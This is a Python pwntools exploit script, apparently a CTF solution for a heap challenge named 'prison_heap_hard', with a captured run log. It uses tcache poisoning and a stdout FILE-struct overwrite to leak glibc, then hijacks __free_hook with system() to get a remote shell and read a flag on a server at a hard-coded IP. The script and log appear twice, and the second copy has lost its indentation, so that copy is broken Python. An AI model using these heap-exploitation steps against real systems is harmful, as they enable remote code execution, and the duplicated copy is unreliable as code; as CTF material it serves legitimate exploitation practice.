KaoRz/prison.py

## prison.py
#!/usr/bin/env python3
# coding: utf-8
from pwn import *

context.terminal = ['tmux', 'sp', '-h']
#context.log_level = 'DEBUG'

HOST  = "104.248.128.57"
PORT  = 13337
LOCAL = False

elf   = ELF("./prison_heap_hard")
libc  = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec = False)

def write_prison(size, data, corrupted = False):
    io.recvuntil("3. Exit")
    io.sendline("1")
    io.recvuntil("heap")
    io.sendline(str(size))
    if not corrupted:
        io.recvuntil("enter the prison\n")
        io.sendline(data)
    else:
        io.recvuntil("enter the prison")
        sleep(0.5)
        io.sendline(data)

def free_prison(idx):
    io.recvuntil("3. Exit")
    io.sendline("2")
    io.recvuntil("free")
    io.sendline(str(idx))

while(True):
    if LOCAL == True:
        io = process(elf.path)

    else:
        io = remote(HOST, PORT)

    write_prison(0x10, "")                  # 0
    write_prison(0x100, "")                 # 1
    write_prison(0x100, "/bin/sh\x00")      # 2 (Barrier)
    for _ in range(8):
        free_prison(1)

    free_prison(0)
    free_prison(0)
    write_prison(0x10, p8(0x80))            # 3 (Overwrite fd pointer)
    write_prison(0x10, "")                  # 4
    write_prison(0x10, p16(0x8760))         # 5 (Good luck)
    write_prison(0x100, "")                 # 6

    try:
        write_prison(0x100, p64(0xfbad1800) + p64(0x0) * 3 + b"\x00")
        pre_leak = io.recv(0x8)
        if pre_leak != b"\x00" * 8:
            log.failure("FAIL! Retrying...")
            io.close()
            continue

        log.success("HIT! Stdout struct overwritten.")
        leak = u64(io.recv(8))
        log.success("Leaked GLIBC address: " + hex(leak))
        break

    except EOFError as error:
        log.failure("FAIL! Retrying...")
        io.close()
        continue

libc.address = leak - 0x3ed8b0
log.info("GLIBC base address: " + hex(libc.address))
log.info("System@@GLIBC address: " + hex(libc.sym["system"]))

write_prison(0x30, "", True)
free_prison(8)
free_prison(8)
write_prison(0x30, p64(libc.sym["__free_hook"]), True)
write_prison(0x30, "", True)
write_prison(0x30, p64(libc.sym["system"]), True)
free_prison(2)

io.interactive()
io.close()

'''
[*] '/home/kaorz/Desktop/CTFs/coronafw/heap2/prison_heap_hard'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[-] FAIL! Retrying...
[*] Closed connection to 104.248.128.57 port 13337
[+] Opening connection to 104.248.128.57 on port 13337: Done
[+] HIT! Stdout struct overwritten.
[+] Leaked GLIBC address: 0x7f58d6c498b0
[*] GLIBC base address: 0x7f58d685c000
[*] System@@GLIBC address: 0x7f58d68ab440
[*] Switching to interactive mode
$ cat /home/prison/prison_heap_hard/flag.txt
flag{h34p_Pr1s0n_1s_n3C3ss4rY_To_h4ck_Th3_Pl4n3t}
'''
	#!/usr/bin/env python3
	# coding: utf-8
	from pwn import *

	context.terminal = ['tmux', 'sp', '-h']
	#context.log_level = 'DEBUG'

	HOST = "104.248.128.57"
	PORT = 13337
	LOCAL = False

	elf = ELF("./prison_heap_hard")
	libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec = False)

	def write_prison(size, data, corrupted = False):
	io.recvuntil("3. Exit")
	io.sendline("1")
	io.recvuntil("heap")
	io.sendline(str(size))
	if not corrupted:
	io.recvuntil("enter the prison\n")
	io.sendline(data)
	else:
	io.recvuntil("enter the prison")
	sleep(0.5)
	io.sendline(data)

	def free_prison(idx):
	io.recvuntil("3. Exit")
	io.sendline("2")
	io.recvuntil("free")
	io.sendline(str(idx))

	while(True):
	if LOCAL == True:
	io = process(elf.path)

	else:
	io = remote(HOST, PORT)

	write_prison(0x10, "") # 0
	write_prison(0x100, "") # 1
	write_prison(0x100, "/bin/sh\x00") # 2 (Barrier)
	for _ in range(8):
	free_prison(1)

	free_prison(0)
	free_prison(0)
	write_prison(0x10, p8(0x80)) # 3 (Overwrite fd pointer)
	write_prison(0x10, "") # 4
	write_prison(0x10, p16(0x8760)) # 5 (Good luck)
	write_prison(0x100, "") # 6

	try:
	write_prison(0x100, p64(0xfbad1800) + p64(0x0) * 3 + b"\x00")
	pre_leak = io.recv(0x8)
	if pre_leak != b"\x00" * 8:
	log.failure("FAIL! Retrying...")
	io.close()
	continue

	log.success("HIT! Stdout struct overwritten.")
	leak = u64(io.recv(8))
	log.success("Leaked GLIBC address: " + hex(leak))
	break

	except EOFError as error:
	log.failure("FAIL! Retrying...")
	io.close()
	continue

	libc.address = leak - 0x3ed8b0
	log.info("GLIBC base address: " + hex(libc.address))
	log.info("System@@GLIBC address: " + hex(libc.sym["system"]))

	write_prison(0x30, "", True)
	free_prison(8)
	free_prison(8)
	write_prison(0x30, p64(libc.sym["__free_hook"]), True)
	write_prison(0x30, "", True)
	write_prison(0x30, p64(libc.sym["system"]), True)
	free_prison(2)

	io.interactive()
	io.close()

	'''
	[*] '/home/kaorz/Desktop/CTFs/coronafw/heap2/prison_heap_hard'
	Arch: amd64-64-little
	RELRO: Full RELRO
	Stack: Canary found
	NX: NX enabled
	PIE: PIE enabled
	[+] Opening connection to 104.248.128.57 on port 13337: Done
	[-] FAIL! Retrying...
	[*] Closed connection to 104.248.128.57 port 13337
	[+] Opening connection to 104.248.128.57 on port 13337: Done
	[-] FAIL! Retrying...
	[*] Closed connection to 104.248.128.57 port 13337
	[+] Opening connection to 104.248.128.57 on port 13337: Done
	[-] FAIL! Retrying...
	[*] Closed connection to 104.248.128.57 port 13337
	[+] Opening connection to 104.248.128.57 on port 13337: Done
	[-] FAIL! Retrying...
	[*] Closed connection to 104.248.128.57 port 13337
	[+] Opening connection to 104.248.128.57 on port 13337: Done
	[-] FAIL! Retrying...
	[*] Closed connection to 104.248.128.57 port 13337
	[+] Opening connection to 104.248.128.57 on port 13337: Done
	[-] FAIL! Retrying...
	[*] Closed connection to 104.248.128.57 port 13337
	[+] Opening connection to 104.248.128.57 on port 13337: Done
	[-] FAIL! Retrying...
	[*] Closed connection to 104.248.128.57 port 13337
	[+] Opening connection to 104.248.128.57 on port 13337: Done
	[-] FAIL! Retrying...
	[*] Closed connection to 104.248.128.57 port 13337
	[+] Opening connection to 104.248.128.57 on port 13337: Done
	[-] FAIL! Retrying...
	[*] Closed connection to 104.248.128.57 port 13337
	[+] Opening connection to 104.248.128.57 on port 13337: Done
	[-] FAIL! Retrying...
	[*] Closed connection to 104.248.128.57 port 13337
	[+] Opening connection to 104.248.128.57 on port 13337: Done
	[+] HIT! Stdout struct overwritten.
	[+] Leaked GLIBC address: 0x7f58d6c498b0
	[*] GLIBC base address: 0x7f58d685c000
	[*] System@@GLIBC address: 0x7f58d68ab440
	[*] Switching to interactive mode
	$ cat /home/prison/prison_heap_hard/flag.txt
	flag{h34p_Pr1s0n_1s_n3C3ss4rY_To_h4ck_Th3_Pl4n3t}
	'''